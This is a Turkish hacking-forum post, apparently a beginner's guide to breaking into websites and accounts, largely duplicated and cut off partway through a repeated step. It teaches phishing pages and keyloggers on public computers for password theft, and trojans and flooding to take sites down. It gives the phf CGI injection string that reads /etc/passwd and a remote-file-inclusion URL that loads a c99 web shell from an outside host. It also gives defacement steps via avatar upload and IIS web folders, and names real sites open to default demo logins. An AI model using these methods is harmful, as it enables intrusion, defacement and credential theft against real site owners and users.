By.CheqiCi
Kayıtlı Üye
S.a Hack konusunda Yeni olanlara ufak bir döküman hazırladım.Gerisi Kısa zamanda gelçek
Sanala yeni gelenler hacker olmak ister onlara bir yol işte
Herşeyden önçe kendinize lakap takınız kimsenin kullanmadıgı güzel bir lakap Sonra Kendinize msn alınız ve yola devam ediyoruz.
Herşeyden önçe Bunları ögrenmeliyiz
1:Hacker nedir.
2:lamer nedir?
3:FaKe Nedir?Ne işe yarar.Nasıl Kullanılır?
4:Keyloger Nedir?Ne işe yarar.Nasıl Kullanılır?
5:Turkojen Nedir?Ne işe yarar.Nasıl Kullanılır?
6:Trojen Nedir?Ne işe yarar.Nasıl kullanılır?
7:Whois Nedir?Ne işe yarar?
8:Zone Nedir?Ne işe yarar?
9:FLOOD yapma Nedir?
10OMAİN Hack ve HOST Hack
11:Ftp HACK
12DOS Nedir?
Şimdilik Bunları bilmemiz şartdır Şimdi diyeçeksiniz bunları bilinçe biz site mi msn kıraçaz sanki diyeçeniz hayır bunları bilmezseniz hacker olamazsınız.
Şimdi Bu soruları çevaplıyalım sonra Site,Msn,Pc,Irc,Mırc nasıl hacklenir onları Kısaca anlatçam
(1:Hacker nedir:
:Günümüz çaginda bilgisayar kullaniminin artmasi ve bilgisayar kullaniminin yerel ag sistemleri araciligi ile daha cazip gelmesi ve internet..
Hackerligi cazip kilan nedenlerden biride budur.Hackerler bilgisayar virüsü yazilimlari gelistirilerek bir çok sifre kirmak baskalarinin
bilgisayarlarina girmek dosyalarini silmek yada çogaltmak ve bunun gibi bir çok islemi yapan bilgisayar kullanicilarina verilen genel addir...
(2:Lamer Nedir:
Lamer in İngilizce’de argoda
kullanılan ve bir miktar hakaret içeren bir kelime olduğunu ifade
ederek, bu kelimenin en basit ve nazik olarak bilgisayar konusunda
gereksiz tartışmalar içine giren, çok bilmiş gibi görünüp bilmediği
konular üzerine yorum yapan ve programlama bilgisi yok denecek kadar az
olanlara verilen aşağılayıcı bir unvan’ anlamına gelmektir...
(3:Fake Nedir:
Günümüzde yeni başkayan arkadaşlarımız en kolay msn şifre çalma yöntemi olan Fake Mail öğrenmeye çalışıyor
Peki Nedir Bu Fake ?
Fake mail kullanıcının dikkatsizliğinden de yararlanarak her zaman girdiği, gezdiği, gördüğü bir sayfanın fake'ini yollayarak şifresini ele geçiriyor...
Bu yöntem aslında mantıklı ve zekicedir fakat artık kullanıcıların çoğu bu yöntemi kolaylıkla anlıyabiliyor ...
Fake (sahte site) HTML dediğimiz kodlarla yapılır
(4:Keyloger Nedir:
Keylogger klavyede bası.. tüm tuşları kaydeden bir programdır
Keylogger’ı internet cafe gibi herkese açık bilgisayarlara kurabiliriz...böylece keylogger’ lı bilgisayar oturan kişinin tüm şifrelerini çalabilirsiniz..teojanlarında şifre çalma özelliği keylogger la sağlanmaktadır...
keylogger ların en güzel özelliği gizli çalımalarıdır...böylece kişi keylogger olduğunu farketmez ve bizim işimiz kolaylaşır...
keylogger dan korunmak için anti keylogger programı kullanabilirsiniz..
(5:Turkojen Nedir:
Turkojan’ın mükemmel Uzaktan Yönetim (remote control) özelliği sayesinde, bağlandığınız bilgisayarın ekranını görerek
Kendi mouse ve klavyeniz ile adeta ikinci bir bilgisayarı kullanıyormuş gibi istediğiniz işlemi gerçekleştirebilir
dosyaları açabilir, yazı yazabilir ve diğer işlemleri gerçekleştirebilirsiniz.
http://www.turkojan.com/turkce/kat/ozellikler/ burdna bilgilere daha saglam ulaşırsınız.
(6:Trojan (Truva atı); iki kısımdan oluşan ve bilgisayarları uzaktan kumanda etme amacıyla yazılmış programlardır.
(7:Whois:
Whois Nedir?
Whois sitelerin bilgilerini göstermek amacıyla yapılan şeye whois denir….
Whois Nasıl Çekilir?
Whois çekmek için öncelikle www.whois.sc adresine gidin.çekiceğiniz sitenin ismini boşluğa yazın ve searchin...
Whois Atrıntılı Anlatım
whois çekiceğimiz sitenin ismini yazıp search demiştik.çekiceğimiz sitenin uzantısı com,net,org gibi olmalıdır diğerlerinde çekilmiyor…daha sonra bilgiler karşımıza çıktı.
Website Title: sitenin ismi ve sloganı yazar
Meta Keywords:sitenin tanımı yazar.
Response Code:sitenin kodu yazar
SSL Cert:ssl var mı yokmu o yazar
Alexa Trend/Rank:derece ile ilgili şeyler yazar.
Website Status:active gibi şeyler yazar.
Reverse IP: O sitenin hostundan daha kaç tane olduğu yazar.(önemli)
Server Type:sitenin ne olduğu yazar hangi sistem olduğu yazar.örneğin:ııs.6.0 gibi.(önemli)
IP Address:sitenin ip adresi yazar.(önemli)
IP Location ip adresini hangi ülkede olduğu yazar.
Blacklist Status:clear gibi şeyler yazar.
Whois History:kaç rekor site olduğu yazar.vede tarihi yazar.
Record Type: Domain Name gibi şeyler yazar.
Monitor:ekranı yazar
Wildcard search:site ismi yazar
Other TLDs:O sitenin uazntılarını yazar.örneğin com,net,org,info.biz.us
Name Server:hangi adreslerden siteye yönleniyor o yazar yani ns yönlendirme adresleri yazar.
ICANN Registrarnlineıc gibi şeyler yazar.
Created:domainin alınış tarihini yazar.
Expires:domainin bitiş tarihi yazar.(eğer bittikten sonra kimse almazsa domaini kapabilirisiniz…) (önemli)
Status:active gibi şeyler yazar.
Whois Siteleri
whois çekmek için başlıca siteler şunlardır…
www.whois.sc (geniş whois bilgileri)
http://www.webhosting.info/domains/ (bu siteden o hosttaki sitelerin isimlerini görebilirisiniz…)
www.pir.org (.org lerin whoislerinde aracı firmaları görebilirsiniz)
www.allwhois.sc (Tüm ülkelere whois çekebilirsiniz)
www.netsol.com (bütün domainlerin bağlı olduğu şirket)
(8:Zone:
Zone-h bir siteyi hackladığınızda sitenin o anki resmini ceker ve saklar hacklanan siteler orada kayda alınır
dünyaca kullanılan bir hack sitesidir aslında bizim kullandığımız daha cok kayıt alma işlemidir tabi bu kayıtlarında bir cok sahteciliği
var ama yinede sağlam kayıtlara güvenilir şimdi kayıdı nasıl alırız onuda googleden araştırın ögrenin
(9:FLOOD:
Veritabanı kullanan bir sitenin veritabanını doldurarak bozulmasına ve sitenin çalışmamasına yol açar. Örneğin Denyo ile bir foruma sürekli üye kaydı yaparak veritabanının bozulmasına yol açabilirsiniz.
(10omain ve Host:
DOMAİN HACK: Domain hack ikin genel olarak iki yol vardır.Bunlardan birisi Siteye whois çekerek admin mailini öğrenmek ve maili çalmak tır.Diğeri ise sitenin kayıtlı olduğu domain şirketinin db sini elegeçirmektir.
a.Admin mail hack: Admin mail hack için sakın gizli soru tahmini kullanmayın. Çünkü eğer gizli soru tahmin ettiğin zaman eğer şifreyi değiştiriyorsanız bunun hiçbir önemi yok.Zaten bizim mail hackteki amacımız mail şifresini mailinin sahibinin koyduğu şekilde bulmaktır.Bunun bir çok yolu var önce bir whois le admin in mailini öğreneceğiz.
Sonra eğer edinebiliyorsak admin hakkında bilgi edineceğiz.
Admin eğer fake yiyecek kadar *****sa (hiç sanmam) ben olsam fake yollardım.
Ama yollayacağım fake domain şirketinin
üye giriş sayfası gibi olmalı ve mail aracılığı ile uygun bir mail adresi ile yollanmalı. Buna admin inanmalı.
Eğer admin hakkında bilgi toplayabildiyseniz kendinize göre bir dictionary oluşturun. Ve saldırı yapın. Dictionary admin hakkında topladığımız bilgilere göre yapacağız ama nasıl? Admin hakkında nerede oturduğunu felan altık hangi şehir kaç yaşında doğmuş vb vb vb. Admin zannediyorum oturduğu apartmanın adını koymaz.
Sizde dictionary hazırlarken buna dikkat ediniz
adam çocuğunun adını koyabilir büyük küçük harfle karışık koymuş olabilir ve benzeri.
Siz böyle bir dictionary hazırlamalısınız.
Brute force : Bu yöntem genellikle bana göre pek başarılı olmamıştır. Gine de şifre kombineleri ile saldırıp kırabiliriz. Eğer şanslıysan kısa zamanda kırabilirsin.
b.Ayrıca başka bir yöntemde domainin kayıtlım olduğu sitenin db sini ele geçirmektir.
HOST HACK : Eğer hotsu hack etmek istiyorsak öncelikle sistemin nasıl çalıştığını ve sistem hakkında bilgiler edinmemiz gerekir. Sistemin çalışma şekli zaten genelde iki şekildedir. Windows ve Linux.
a. Windows : şimdi burada ufak bir ayrıntıya değinmek istiyorum. Eğer site asp ise Windows server ISS üzerine kuruludur. Eğer site php ise o zaman Linux da apache üzerine kuruludur. Eğer sitenin server i ISS 4.0 yada bunun altı ise o zaman sitede msdac.dll açığı vardır. O zaman perl de whisker exploitini derleyip çalıştıralım sonuca ulaşacağız.
Eğer server ISS 4.0 ın üstünde bir serverse o zaman sitede kod açıkları bulmamız gerekecektir.
Bunu n-stealth adlı programla yapabiliriz.Eğer açık bulursanız dalarsınız.
Eğer dalınacak gibi bir açık değilse ve risk seviyesi yüksek ise o zaman o açığın exploiti vardır. Explotiti bulup derleyin çalıştırın sonuca ulaşacaksınız. Eğer risk seviyesi yüksek bir açık bulamadı iseniz o zaman domain hackte olduğu gigib bir wordlist hazırlayıp admin şifresini kırmaya çalışınız yada ftp şifresini kırmaya çalışınız.
b. Linux : Sitede bu durumda php oluyor. Eğer site php ise o zaman eski yöntemlerden yeni yöntemlere doğru bir deneme yapın eski bir yöntem olan / /ETC açığına bakın. Eğer varsa içinde mutlaka password.bak dosyası vardır onu alın ve kırın.
================================================== = =
Selamlar... Bu yazıda daha basit ama daha hızlı bir hack yöntemini anlatacağım
Bu yöntem çok hoşunuza gidecek Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral&l039;s Dict Maker.
--------------------------------------
Mantık : phf sistemlerde bulunan bir açıktır ve bu acık sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur.
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar.../cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari listeler...
Komutun Kullanimi Kolay!
Simdi Biraz Ornek Cozelim!
--------------------------------------
================================================== == ===
Eğer bu açık yoksa sizde cgi/phf?qalias (cgi açıkları) yollarını deneyin. Açığı bulursanız bu yollarsa siteye girebilirsiniz. Cgi açıkları bulun. Eğer giremediyseniz brute force kullanın buda olmadı ise gine n-stealth ile bi açık taraması yaptırın ve risk seviyesi yüksek bir açık
bulursanız exploit ini bulun ve derleyip çalıştırın. Sonuca ulaşın.
(11:FTP HACK
FTP HACK İÇİN FTP FİLEZİLLA NINI NE İŞE YARADIGINI + FTP NEDİR BUNLAIR KENDİNİZ GOOGLEDNE ARAŞTIRINIZ
(12DOS NEDİR
DDos: DDos un amacı herhangi bir sitenin yayınına engel olmaktır.DDos veri tabanı kullanan sitelerde daha fazla etki yapar.Örneğin site php ise mysql site asp ise mdb veri tabanını kullanır.DDos siteye her saniye de bir kullanıcı sokarak veritabanı nın sesionlarını karıştırır ve site iner.
Burada ufak bir şey söyleyeyim bu bir yöntem örneğin siz herhangi bir siteye DDos saldırı yapacaksınız.DDos un etkili olabilmesi için sizin bağlantı hızınızın
iyi olması gerekir.Bağlantı hızınız iyi değilse siz de DDos yaparken http://www.sitenick.com/index.php gibi bir uzantı kullanırsanız daha iyi olur.Bu durumda sitenin index ini sapıttırırsınız.Sitedeki index bozulur.Şöyle bir hata veriyordu yanlış hatırlamıyorsam ;Genel hata; gibi bir hata veriyor..
ŞİMDİ ARKLAR BUNLARI ÖGRENDİK ŞİMDİ LAMERİZ ŞİMDİ GELELİM BİZ NASIL SİTE HACKLEYEÇEZ DEMİ ARKLAR İLK NEYİ BİLEÇEZ TEK TEK SÖLÜOM BUNLARI ŞİMDİ SİZE
1.Phota açıgını ögrençez sizinle arkadaşlar
Ders 1
Google Yazılacak:signup.php
Sonra Birkaç Sayfa İlerle Birini Seç
Site Böle Olmalı www.xxxxxxxxxxx.com/More_tags.php Olması Lasım
Sonra Bunu Yapıyon www.xxxxxxxxxxx.com/signup.php Olunca
Üye Olmuş Oluyon Siteye
Profiline Avatar Yerine Gif Formatına Çevirdiğin İndexini Upload Ediyon Ve Alttaki Update Tıklıyon
Resim Çıkmayacak Tabi Kırmızı Bi Çarpı Çıkıyor
Çarpıyı Sağ Tıklayıp Özellikten Url Sini Alıyon Url yi Adres Çubuğuna Yapıp Git Diyoruz Bide Bakmışız Ki Hacklemişiz
2,ISS Açıgı
Ders 1
KOD:%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Bu Kodu Alıp Başlat / Çalıştır A Yazın Tamam Tıklayınız.
Şimdi Web Klasörleri klasörü çıkacak.Klasörün herhangi bir yerinde mause'un sağ tuşuyla tıklayalım.Ardından "Yeni" sonrada "Web klasörü" diyelim."eklenecek konumu yazın" yazan yerin altındaki boşluğa Hackleyeceniz siteyi yazınız.
Siteyi Yazınca İleri Tıklıyoruz Sonra Son a Basalım
Yazdğımız site orda gözükecek.Sonra çift tıklayarak eklediğimiz siteye girelim.
Şimdi Bu Ders İndex le İlgili Kendi İndexinizi Frontpage Veya Başka Bir Şekilde Yapın Kaydetin. Uzantısı Html Olsun Şimdi. Adım 5 Teyiz Arkadaşlar.
Şimdi Web Folders Klasörüne Dönelim.Eğer İçerisi Bomboş İse İndex.Html Dosyamızın İsmini İsminiz.html Yapalım (Mesela Nickimiz Cesurgursel ise Cesurgursel.html Yapalım
Öyle Yaparsak Adresine Girdiğimizde Bizim Hazırladığımız İndex Dosyasını Görürüz) Ve Web Folders da Açmış Olduğumuz Siteye Sürükleyerek Gönderelim.Eğer İçerde Dosya Var İse İndex İn İsmi Aynen Kalsın Siz Sadece Sürükle Yöntemiyle Yollayın.(Dosyalar Çıkarsa Direk Adresine Girdiğimizde Bizim Dosyayı Görürüz) Burada Iss Açığı ile iki Dakika da index Atmayı Öğrendik Çok Kolay Bir Yoldur. direk linkte çıkar.
Evet Arkadaşlar Iss Açığı olan tüm sitelerde işe yarar tamam. iyi Hackler...
3:Flashchat v4.5.7
Ders 1
Google Yazılacak:Flashchat v4.5.7
Sonra Birkaç Sayfa İlerle Birini Seç
Seçtigimiz sitenini sonuna bu kodu yazarak c99 Kullanıoruz.
Kod=/inc/cmses/aedating4CMS.php?dir[inc]=http://darkearth.by.ru/c99.txt?
4:Haber sitesi hackleme
Şimdi arklar http://cekicgroup.com/ bu siteyi hackleyeçez demi
sonuna kur.asp yazmamız yeterlidir
http://cekicgroup.com/kur.asp
http://cambalkon.ostim.net/kur.asp
http://www.annkara.com/kur.asp
http://www.herokulabilgisayar.com/kur.asp
ve devam tıklıoruz kullanıcı adı ve şifre demo oluo arklar
ve siteyi hacklemiş oluoz.
Daha önce verildiyse özür dilerim!!!
ALINTI!!
Sanala yeni gelenler hacker olmak ister onlara bir yol işte
Herşeyden önçe kendinize lakap takınız kimsenin kullanmadıgı güzel bir lakap Sonra Kendinize msn alınız ve yola devam ediyoruz.
Herşeyden önçe Bunları ögrenmeliyiz
1:Hacker nedir.
2:lamer nedir?
3:FaKe Nedir?Ne işe yarar.Nasıl Kullanılır?
4:Keyloger Nedir?Ne işe yarar.Nasıl Kullanılır?
5:Turkojen Nedir?Ne işe yarar.Nasıl Kullanılır?
6:Trojen Nedir?Ne işe yarar.Nasıl kullanılır?
7:Whois Nedir?Ne işe yarar?
8:Zone Nedir?Ne işe yarar?
9:FLOOD yapma Nedir?
10OMAİN Hack ve HOST Hack
11:Ftp HACK
12DOS Nedir?
Şimdilik Bunları bilmemiz şartdır Şimdi diyeçeksiniz bunları bilinçe biz site mi msn kıraçaz sanki diyeçeniz hayır bunları bilmezseniz hacker olamazsınız.
Şimdi Bu soruları çevaplıyalım sonra Site,Msn,Pc,Irc,Mırc nasıl hacklenir onları Kısaca anlatçam
(1:Hacker nedir:
:Günümüz çaginda bilgisayar kullaniminin artmasi ve bilgisayar kullaniminin yerel ag sistemleri araciligi ile daha cazip gelmesi ve internet..
Hackerligi cazip kilan nedenlerden biride budur.Hackerler bilgisayar virüsü yazilimlari gelistirilerek bir çok sifre kirmak baskalarinin
bilgisayarlarina girmek dosyalarini silmek yada çogaltmak ve bunun gibi bir çok islemi yapan bilgisayar kullanicilarina verilen genel addir...
(2:Lamer Nedir:
Lamer in İngilizce’de argoda
kullanılan ve bir miktar hakaret içeren bir kelime olduğunu ifade
ederek, bu kelimenin en basit ve nazik olarak bilgisayar konusunda
gereksiz tartışmalar içine giren, çok bilmiş gibi görünüp bilmediği
konular üzerine yorum yapan ve programlama bilgisi yok denecek kadar az
olanlara verilen aşağılayıcı bir unvan’ anlamına gelmektir...
(3:Fake Nedir:
Günümüzde yeni başkayan arkadaşlarımız en kolay msn şifre çalma yöntemi olan Fake Mail öğrenmeye çalışıyor
Peki Nedir Bu Fake ?
Fake mail kullanıcının dikkatsizliğinden de yararlanarak her zaman girdiği, gezdiği, gördüğü bir sayfanın fake'ini yollayarak şifresini ele geçiriyor...
Bu yöntem aslında mantıklı ve zekicedir fakat artık kullanıcıların çoğu bu yöntemi kolaylıkla anlıyabiliyor ...
Fake (sahte site) HTML dediğimiz kodlarla yapılır
(4:Keyloger Nedir:
Keylogger klavyede bası.. tüm tuşları kaydeden bir programdır
Keylogger’ı internet cafe gibi herkese açık bilgisayarlara kurabiliriz...böylece keylogger’ lı bilgisayar oturan kişinin tüm şifrelerini çalabilirsiniz..teojanlarında şifre çalma özelliği keylogger la sağlanmaktadır...
keylogger ların en güzel özelliği gizli çalımalarıdır...böylece kişi keylogger olduğunu farketmez ve bizim işimiz kolaylaşır...
keylogger dan korunmak için anti keylogger programı kullanabilirsiniz..
(5:Turkojen Nedir:
Turkojan’ın mükemmel Uzaktan Yönetim (remote control) özelliği sayesinde, bağlandığınız bilgisayarın ekranını görerek
Kendi mouse ve klavyeniz ile adeta ikinci bir bilgisayarı kullanıyormuş gibi istediğiniz işlemi gerçekleştirebilir
dosyaları açabilir, yazı yazabilir ve diğer işlemleri gerçekleştirebilirsiniz.
http://www.turkojan.com/turkce/kat/ozellikler/ burdna bilgilere daha saglam ulaşırsınız.
(6:Trojan (Truva atı); iki kısımdan oluşan ve bilgisayarları uzaktan kumanda etme amacıyla yazılmış programlardır.
(7:Whois:
Whois Nedir?
Whois sitelerin bilgilerini göstermek amacıyla yapılan şeye whois denir….
Whois Nasıl Çekilir?
Whois çekmek için öncelikle www.whois.sc adresine gidin.çekiceğiniz sitenin ismini boşluğa yazın ve searchin...
Whois Atrıntılı Anlatım
whois çekiceğimiz sitenin ismini yazıp search demiştik.çekiceğimiz sitenin uzantısı com,net,org gibi olmalıdır diğerlerinde çekilmiyor…daha sonra bilgiler karşımıza çıktı.
Website Title: sitenin ismi ve sloganı yazar
Meta Keywords:sitenin tanımı yazar.
Response Code:sitenin kodu yazar
SSL Cert:ssl var mı yokmu o yazar
Alexa Trend/Rank:derece ile ilgili şeyler yazar.
Website Status:active gibi şeyler yazar.
Reverse IP: O sitenin hostundan daha kaç tane olduğu yazar.(önemli)
Server Type:sitenin ne olduğu yazar hangi sistem olduğu yazar.örneğin:ııs.6.0 gibi.(önemli)
IP Address:sitenin ip adresi yazar.(önemli)
IP Location ip adresini hangi ülkede olduğu yazar.
Blacklist Status:clear gibi şeyler yazar.
Whois History:kaç rekor site olduğu yazar.vede tarihi yazar.
Record Type: Domain Name gibi şeyler yazar.
Monitor:ekranı yazar
Wildcard search:site ismi yazar
Other TLDs:O sitenin uazntılarını yazar.örneğin com,net,org,info.biz.us
Name Server:hangi adreslerden siteye yönleniyor o yazar yani ns yönlendirme adresleri yazar.
ICANN Registrarnlineıc gibi şeyler yazar.
Created:domainin alınış tarihini yazar.
Expires:domainin bitiş tarihi yazar.(eğer bittikten sonra kimse almazsa domaini kapabilirisiniz…) (önemli)
Status:active gibi şeyler yazar.
Whois Siteleri
whois çekmek için başlıca siteler şunlardır…
www.whois.sc (geniş whois bilgileri)
http://www.webhosting.info/domains/ (bu siteden o hosttaki sitelerin isimlerini görebilirisiniz…)
www.pir.org (.org lerin whoislerinde aracı firmaları görebilirsiniz)
www.allwhois.sc (Tüm ülkelere whois çekebilirsiniz)
www.netsol.com (bütün domainlerin bağlı olduğu şirket)
(8:Zone:
Zone-h bir siteyi hackladığınızda sitenin o anki resmini ceker ve saklar hacklanan siteler orada kayda alınır
dünyaca kullanılan bir hack sitesidir aslında bizim kullandığımız daha cok kayıt alma işlemidir tabi bu kayıtlarında bir cok sahteciliği
var ama yinede sağlam kayıtlara güvenilir şimdi kayıdı nasıl alırız onuda googleden araştırın ögrenin
(9:FLOOD:
Veritabanı kullanan bir sitenin veritabanını doldurarak bozulmasına ve sitenin çalışmamasına yol açar. Örneğin Denyo ile bir foruma sürekli üye kaydı yaparak veritabanının bozulmasına yol açabilirsiniz.
(10omain ve Host:
DOMAİN HACK: Domain hack ikin genel olarak iki yol vardır.Bunlardan birisi Siteye whois çekerek admin mailini öğrenmek ve maili çalmak tır.Diğeri ise sitenin kayıtlı olduğu domain şirketinin db sini elegeçirmektir.
a.Admin mail hack: Admin mail hack için sakın gizli soru tahmini kullanmayın. Çünkü eğer gizli soru tahmin ettiğin zaman eğer şifreyi değiştiriyorsanız bunun hiçbir önemi yok.Zaten bizim mail hackteki amacımız mail şifresini mailinin sahibinin koyduğu şekilde bulmaktır.Bunun bir çok yolu var önce bir whois le admin in mailini öğreneceğiz.
Sonra eğer edinebiliyorsak admin hakkında bilgi edineceğiz.
Admin eğer fake yiyecek kadar *****sa (hiç sanmam) ben olsam fake yollardım.
Ama yollayacağım fake domain şirketinin
üye giriş sayfası gibi olmalı ve mail aracılığı ile uygun bir mail adresi ile yollanmalı. Buna admin inanmalı.
Eğer admin hakkında bilgi toplayabildiyseniz kendinize göre bir dictionary oluşturun. Ve saldırı yapın. Dictionary admin hakkında topladığımız bilgilere göre yapacağız ama nasıl? Admin hakkında nerede oturduğunu felan altık hangi şehir kaç yaşında doğmuş vb vb vb. Admin zannediyorum oturduğu apartmanın adını koymaz.
Sizde dictionary hazırlarken buna dikkat ediniz
adam çocuğunun adını koyabilir büyük küçük harfle karışık koymuş olabilir ve benzeri.
Siz böyle bir dictionary hazırlamalısınız.
Brute force : Bu yöntem genellikle bana göre pek başarılı olmamıştır. Gine de şifre kombineleri ile saldırıp kırabiliriz. Eğer şanslıysan kısa zamanda kırabilirsin.
b.Ayrıca başka bir yöntemde domainin kayıtlım olduğu sitenin db sini ele geçirmektir.
HOST HACK : Eğer hotsu hack etmek istiyorsak öncelikle sistemin nasıl çalıştığını ve sistem hakkında bilgiler edinmemiz gerekir. Sistemin çalışma şekli zaten genelde iki şekildedir. Windows ve Linux.
a. Windows : şimdi burada ufak bir ayrıntıya değinmek istiyorum. Eğer site asp ise Windows server ISS üzerine kuruludur. Eğer site php ise o zaman Linux da apache üzerine kuruludur. Eğer sitenin server i ISS 4.0 yada bunun altı ise o zaman sitede msdac.dll açığı vardır. O zaman perl de whisker exploitini derleyip çalıştıralım sonuca ulaşacağız.
Eğer server ISS 4.0 ın üstünde bir serverse o zaman sitede kod açıkları bulmamız gerekecektir.
Bunu n-stealth adlı programla yapabiliriz.Eğer açık bulursanız dalarsınız.
Eğer dalınacak gibi bir açık değilse ve risk seviyesi yüksek ise o zaman o açığın exploiti vardır. Explotiti bulup derleyin çalıştırın sonuca ulaşacaksınız. Eğer risk seviyesi yüksek bir açık bulamadı iseniz o zaman domain hackte olduğu gigib bir wordlist hazırlayıp admin şifresini kırmaya çalışınız yada ftp şifresini kırmaya çalışınız.
b. Linux : Sitede bu durumda php oluyor. Eğer site php ise o zaman eski yöntemlerden yeni yöntemlere doğru bir deneme yapın eski bir yöntem olan / /ETC açığına bakın. Eğer varsa içinde mutlaka password.bak dosyası vardır onu alın ve kırın.
================================================== = =
Selamlar... Bu yazıda daha basit ama daha hızlı bir hack yöntemini anlatacağım
Bu yöntem çok hoşunuza gidecek Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral&l039;s Dict Maker.
--------------------------------------
Mantık : phf sistemlerde bulunan bir açıktır ve bu acık sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur.
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar.../cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari listeler...
Komutun Kullanimi Kolay!
Simdi Biraz Ornek Cozelim!
--------------------------------------
================================================== == ===
Eğer bu açık yoksa sizde cgi/phf?qalias (cgi açıkları) yollarını deneyin. Açığı bulursanız bu yollarsa siteye girebilirsiniz. Cgi açıkları bulun. Eğer giremediyseniz brute force kullanın buda olmadı ise gine n-stealth ile bi açık taraması yaptırın ve risk seviyesi yüksek bir açık
bulursanız exploit ini bulun ve derleyip çalıştırın. Sonuca ulaşın.
(11:FTP HACK
FTP HACK İÇİN FTP FİLEZİLLA NINI NE İŞE YARADIGINI + FTP NEDİR BUNLAIR KENDİNİZ GOOGLEDNE ARAŞTIRINIZ
(12DOS NEDİR
DDos: DDos un amacı herhangi bir sitenin yayınına engel olmaktır.DDos veri tabanı kullanan sitelerde daha fazla etki yapar.Örneğin site php ise mysql site asp ise mdb veri tabanını kullanır.DDos siteye her saniye de bir kullanıcı sokarak veritabanı nın sesionlarını karıştırır ve site iner.
Burada ufak bir şey söyleyeyim bu bir yöntem örneğin siz herhangi bir siteye DDos saldırı yapacaksınız.DDos un etkili olabilmesi için sizin bağlantı hızınızın
iyi olması gerekir.Bağlantı hızınız iyi değilse siz de DDos yaparken http://www.sitenick.com/index.php gibi bir uzantı kullanırsanız daha iyi olur.Bu durumda sitenin index ini sapıttırırsınız.Sitedeki index bozulur.Şöyle bir hata veriyordu yanlış hatırlamıyorsam ;Genel hata; gibi bir hata veriyor..
ŞİMDİ ARKLAR BUNLARI ÖGRENDİK ŞİMDİ LAMERİZ ŞİMDİ GELELİM BİZ NASIL SİTE HACKLEYEÇEZ DEMİ ARKLAR İLK NEYİ BİLEÇEZ TEK TEK SÖLÜOM BUNLARI ŞİMDİ SİZE
1.Phota açıgını ögrençez sizinle arkadaşlar
Ders 1
Google Yazılacak:signup.php
Sonra Birkaç Sayfa İlerle Birini Seç
Site Böle Olmalı www.xxxxxxxxxxx.com/More_tags.php Olması Lasım
Sonra Bunu Yapıyon www.xxxxxxxxxxx.com/signup.php Olunca
Üye Olmuş Oluyon Siteye
Profiline Avatar Yerine Gif Formatına Çevirdiğin İndexini Upload Ediyon Ve Alttaki Update Tıklıyon
Resim Çıkmayacak Tabi Kırmızı Bi Çarpı Çıkıyor
Çarpıyı Sağ Tıklayıp Özellikten Url Sini Alıyon Url yi Adres Çubuğuna Yapıp Git Diyoruz Bide Bakmışız Ki Hacklemişiz
2,ISS Açıgı
Ders 1
KOD:%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Bu Kodu Alıp Başlat / Çalıştır A Yazın Tamam Tıklayınız.
Şimdi Web Klasörleri klasörü çıkacak.Klasörün herhangi bir yerinde mause'un sağ tuşuyla tıklayalım.Ardından "Yeni" sonrada "Web klasörü" diyelim."eklenecek konumu yazın" yazan yerin altındaki boşluğa Hackleyeceniz siteyi yazınız.
Siteyi Yazınca İleri Tıklıyoruz Sonra Son a Basalım
Yazdğımız site orda gözükecek.Sonra çift tıklayarak eklediğimiz siteye girelim.
Şimdi Bu Ders İndex le İlgili Kendi İndexinizi Frontpage Veya Başka Bir Şekilde Yapın Kaydetin. Uzantısı Html Olsun Şimdi. Adım 5 Teyiz Arkadaşlar.
Şimdi Web Folders Klasörüne Dönelim.Eğer İçerisi Bomboş İse İndex.Html Dosyamızın İsmini İsminiz.html Yapalım (Mesela Nickimiz Cesurgursel ise Cesurgursel.html Yapalım
